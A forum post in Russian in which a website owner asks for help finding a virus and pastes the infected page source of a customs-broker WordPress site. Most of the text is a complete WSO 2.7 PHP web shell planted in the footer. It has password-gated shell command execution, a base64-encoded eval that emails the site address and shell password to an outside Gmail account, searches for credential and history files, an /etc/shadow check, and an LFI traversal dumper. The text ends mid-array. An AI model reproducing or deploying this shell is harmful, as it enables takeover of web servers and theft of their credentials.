Не могу найти вирус на сайте
-
Добрый день уважаемые форумчане.
Есть такая проблема: не могу найти вирус.
Антивирусом определяется, как PHP: Shell-AA [Trj]
успел урвать исходный код … антивирус не дает его сохранить в html.
Вот, собственно, код:<!-- startovaya --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="ru-RU"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <title>|</title> <script type="text/javascript" src="http://www.ved.kiev.ua/wp-content/themes/ved28/script.js"></script> <link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.css" type="text/css" media="screen" /> <!--[if IE 6]><link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.ie6.css" type="text/css" media="screen" /><![endif]--> <!--[if IE 7]><link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.ie7.css" type="text/css" media="screen" /><![endif]--> <!--[if lt IE 8]> <style> .art-sidebar1 #mycategoryorder-3 { height:230px; } </style> <![endif]--> <link rel="alternate" type="application/rss+xml" title="RSS-лента " href="http://www.ved.kiev.ua/feed/" /> <link rel="alternate" type="application/atom+xml" title="Atom-лента " href="http://www.ved.kiev.ua/feed/atom/" /> <link rel="pingback" href="http://www.ved.kiev.ua/xmlrpc.php" /> <link rel='stylesheet' id='contact-form-7-css' href='http://www.ved.kiev.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.9.1' type='text/css' media='all' /> <script type='text/javascript' src='http://www.ved.kiev.ua/wp-includes/js/jquery/jquery.js?ver=1.11.0'></script> <script type='text/javascript' src='http://www.ved.kiev.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.ved.kiev.ua/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.ved.kiev.ua/wp-includes/wlwmanifest.xml" /> <meta http-equiv="Content-Language" content="ru-RU" /> <style type="text/css" media="screen"> .qtrans_flag span { display:none } .qtrans_flag { height:12px; width:18px; display:block } .qtrans_flag_and_text { padding-left:20px } .qtrans_flag_RU { background:url(http://www.ved.kiev.ua/wp-content/plugins/qtranslate/flags/ru.png) no-repeat } .qtrans_flag_UK { background:url(http://www.ved.kiev.ua/wp-content/plugins/qtranslate/flags/ua.png) no-repeat } </style> <link hreflang="UK" href="http://www.ved.kiev.ua/?lang=UK" rel="alternate" /> <!-- All in One SEO Pack 2.2.2 by Michael Torbert of Semper Fi Web Design[371,378] --> <link rel='next' href='http://www.ved.kiev.ua/page/2/' /> <!-- /all in one seo pack --> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); })('//www.ved.kiev.ua/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=258B8D4BD3873E3485AC9895DE418C0B'); </script><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-17105861-26']); _gaq.push(['_setDomainName', '.ved.kiev.ua']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </head> <body> <div id="art-page-background-simple-gradient"> </div> <div id="art-main"> <div class="art-Sheet"> <div class="art-Sheet-cc"></div> <div class="art-Sheet-body"> <div class="art-Header"> <div class="art-Header-jpeg"></div> <div class="art-Logo"> <h1 id="name-text" class="art-Logo-name"> <a href="http://www.ved.kiev.ua/"></a></h1> <div id="slogan-text" class="art-Logo-text"> </div> </div> </div> <div class="langs-switch"><a href=""><img src="/wp-content/plugins/qtranslate/flags/ua.png" width="18" height="12" alt="" border="0"></a> <a href=""><img src="/wp-content/plugins/qtranslate/flags/ru.png" width="18" height="12" alt="" border="0"></a></div> <div class="art-contentLayout"> <br /> <b>Warning</b>: include(/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/sidebar1.php): failed to open stream: No such file or directory in <b>/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/front-page.php</b> on line <b>4</b><br /> <br /> <b>Warning</b>: include(): Failed opening '/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/sidebar1.php' for inclusion (include_path='.:/usr/local/pear') in <b>/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/front-page.php</b> on line <b>4</b><br /> <div class="art-content"> <div class="art-Post"> <div class="art-Post-body"> <div class="art-Post-inner art-article"> <div class="art-PostContent"> </div> <div class="cleared"></div> </div> <div class="cleared"></div> </div> </div> <div class="art-Post"> <div class="art-Post-body"> <div class="art-Post-inner art-article"> <div class="art-PostMetadataHeader"> <h2 class="art-PostHeader"> <a href="http://www.ved.kiev.ua/o-kompanii/" rel="bookmark" title="Постоянная ссылка на О КОМПАНИИ"> О КОМПАНИИ</a> </h2> </div> <div class="art-PostContent"> <p><strong>Компания ООО «ВЭДЛАЙН УКРАИНА», действующая на основании лицензии АЕ 272025, предоставляет полный спектр таможенно-брокерских услуг на всех грузовых отделах Киевской межрегиональной таможни Миндоходов и Киевской таможни Миндоходов (Борисполь).</strong></p> <p><strong>Профессиональный, качественный и комплексный подход к каждому Клиенту лично. Гибкая система оплаты услуг. Квалифицированные сотрудники.</strong></p> <p><strong>– заполнение и оформление предварительных таможенных деклараций и уведомлений</strong><br /> <strong> – консультации по внешнеэкономической деятельности, прогнозирование возможных рисков и затрат заказчика.</strong><br /> <strong> – консультации по тарифному регулированию</strong><br /> <strong> – оптимизация таможенных расходов</strong><br /> <strong> – составление внешнеэкономических контрактов, инвойсов, заполнение транспортных документов – CMR, CARNET TIR, экологических деклараций.</strong><br /> <strong> – таможенное оформление грузов на любом ТГО г.Киева.</strong><br /> <strong> – оформление на всех курьерских службах грузов любой сложности (М-16, грузы до 100/300 евро)</strong><br /> <strong> – аккредитация субъектов ВЭД</strong><br /> <strong> – предварительный расчет платежей</strong><br /> <strong> – подбор кода по УКТВЭД</strong><br /> <strong> – предоставляем услуги по оформлению всех разрешительных документов (гигиенические заключения, сертификация, энергосбережение, укрчастотнадзор и прочие)</strong></p> <p><span style="color: #000080;">__________________________________________________________________________________________________________________</span>_</p> <p style="text-align: left;"><strong>НАШИ КЛИЕНТЫ:</strong></p> <p style="text-align: left;"><strong><img class="alignleft size-medium wp-image-420" title="Bosch1" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Bosch1-300x54.png" alt="" width="300" height="54" /> </strong></p> <p style="text-align: left;"><img class="size-full wp-image-125 alignleft" style="margin: 20px; border: 0px none currentColor;" title="logo" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/logo.png" alt="" width="213" height="50" /></p> <p style="text-align: left;"><img class="alignleft size-medium wp-image-424" title="Безымянный3" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный3-300x33.png" alt="" width="300" height="33" /></p> <p style="text-align: left;"><img class="alignleft size-medium wp-image-426" title="Безымянный33" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный331-300x41.png" alt="" width="300" height="41" /></p> <p style="text-align: left;"><img class="alignleft size-medium wp-image-423" title="Безымянный" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный2-300x140.png" alt="" width="300" height="140" /></p> <p style="text-align: left;"><img class="alignleft size-medium wp-image-448" title="Miro-MIX_03" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Miro-MIX_03-300x79.gif" alt="" width="300" height="79" /></p> <p> </p> </div> <div class="cleared"></div> </div> <div class="cleared"></div> </div> </div> </div> </div> <div class="cleared"></div> <div class="art-Footer"> <div class="art-Footer-inner"> <a href="http://www.ved.kiev.ua/feed/" class="art-rss-tag-icon" title="RSS"></a> <div class="art-Footer-text"> <p> <p style="text-align: center;" id="footer-text">Полный спектр таможенно-брокерских услуг в Киеве. "ВЭДЛАЙН" - Все права защищены.</p> <p style="text-align: center;" id="footer-text"><a href="http://pechati.kiev.ua">печати и штампы</a></p> <?php /* WSO 2.7 (404 Error Web Shell by Madleets.com) */ /*Maded by DrSpy*/ $auth_pass = "c1c425268e68385d1ab5074c17a94f14"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @session_start(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.7'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); } function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else wsoLogin(); if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; $wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: $color !important; } span{ font-weight: bolder; } h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:250px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '<h1>Server security information</h1><div class=content>'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '</div>'; wsoFooter(); } function actionlfiscan() { wsoHeader(); print ' <h3>Led-Zeppelin\'s LFI File dumper</h3> <form method="post" action="?"><input type="hidden" name="a" value="lfiscan"> LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype"> <option value="1"> Access Log </option> <option value="2"> httpd.conf </option> <option value="3"> Error Log </option> <option value="4"> php.ini </option> <option value="5"> MySQL </option> <option value="6"> FTP </option> <option value="7"> Environ </option> </select> Null: <select name="null"> <option value="%00"> Yes </option> <option value=""> No </option> </select> User-Agent: <input type="text" size="20" name="custom_header" value=""> </form>'; error_reporting(0); if($_POST['lfiurl']) { print "<pre>"; $cheader = $_POST['custom_header']; $target = $_POST['lfiurl']; $type = $_POST['scantype']; $byte1 = $_POST['null']; $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1.""; $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1.""; $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1.""; $lfiaccess = array( 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."", 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."", 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."", 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."", 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."", 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."", 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."", 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."", 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."", 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."", 11 => 